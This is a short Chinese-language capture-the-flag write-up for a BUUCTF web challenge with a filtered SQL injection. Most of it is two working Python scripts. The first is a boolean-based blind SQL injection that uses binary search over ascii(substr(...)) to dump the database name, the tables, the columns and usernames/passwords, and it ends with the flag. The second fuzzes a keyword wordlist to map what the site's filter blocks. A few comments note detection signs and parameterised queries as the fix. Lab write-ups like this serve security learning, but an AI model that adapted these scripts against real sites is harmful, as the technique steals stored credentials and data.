思路
带过滤的 SQL 盲注，直接用脚本一把梭。
import requests
# Boolean-based blind SQL injection walkthrough for the challenge's search.php.
# The page distinguishes two states ("ERROR!!!" vs. anything else), so each
# character of the target expression is recovered by binary search over the
# printable ASCII range.  From the server side this shows up as a burst of GET
# requests to search.php whose id contains "ascii(substr(" — a cheap detection
# signature — and is closed off entirely by parameterised queries plus a
# response that does not differ between the two branches.
url = "http://79e4ba64-19bf-4394-a0d4-c3d4d8bcb203.node5.buuoj.cn:81/search.php"

# Each reassignment is one step of the walkthrough; the trailing comment is the
# value that step recovered.  Only the final assignment is actually used below.
select = "select(database())"  # geek
select = "select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())"  # F1naI1y,Flaaaaag
select = "select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')"  # id,fl4gawsl
select = "select(group_concat(id,fl4gawsl))from(Flaaaaag)"  # 1NO!
select = "select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')"  # id,username,password
select = "select(group_concat(id,username,password))from(F1naI1y)"  # 1mygodcl4y_is_really_amazing,2welcomewelcome_to_my_blog,3sitehttp://www.cl4y.top,4sitehttp://www.cl4y.top,5sitehttp://www.cl4y.top,6sitehttp://www.cl4y.top,7Sycwelcom_to_Syclover,8finallycl4y_really_need_a_grilfriend,9flagflag{5bb6ba67-d838-407c-9c1c-de45fa11a7a3}

result = ""
for pos in range(1, 1000):
    # Binary search the ASCII range [32, 127) for the character at `pos`.
    lo, hi = 32, 127
    guess = (lo + hi) // 2
    while lo < hi:
        # "ERROR!!!" means the comparison was true (1^1 == 0, so no row matched).
        probe = {"id": f"1^(ascii(substr(({select}),{pos},1))>{guess})"}
        resp = requests.get(url, params=probe)
        if "ERROR!!!" in resp.text:
            lo = guess + 1
        else:
            hi = guess
        guess = (lo + hi) // 2
    result += chr(lo)
    print(result)
    # The search collapsing onto either end of the range marks the end of the string.
    if guess in (32, 126):
        print("注入完成,结果为:\n[::]", result)
        exit(0)
找到一个有用的脚本
import requests
import time
# 打开读取SQL_fuzz文件
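# Check which wordlist entries trip the site's filter.
# Each line of SQL_fuzz.txt is appended to the search URL and the response is
# checked for the filter's marker text.  Operationally this is one GET per
# wordlist line in quick succession, which is easy to spot in access logs.
with open("SQL_fuzz.txt", "r") as f:
    contents = f.readlines()
# Drop the trailing newline from every line.  The `with` block has already
# closed the file; the bare `f.close` that used to follow was a no-op.
data_list = [msg.strip('\n') for msg in contents]

url = "http://3f8893c2-6eda-4113-bcfa-2b6188684bd7.node4.buuoj.cn:81/search.php?id="
# Marker the site returns when a request was blocked by its filter.
reponse_txt = "臭弟弟"
# GET request per wordlist entry.  A timeout keeps one stalled response from
# hanging the whole run.
for data in data_list:
    r = requests.get(url + data, timeout=10)
    # Short pause so the server has time to respond between requests.
    time.sleep(0.04)
    if reponse_txt in r.text:
        print("该网站过滤了{}".format(data))
# POST variant (kept from the author's notes, disabled):
# for d in data_list:
#     payload = {"": d}
#     r = requests.post(url=url, data=payload)
#     if reponse_txt in r.text:
#         print("该网站过滤了{}".format(data))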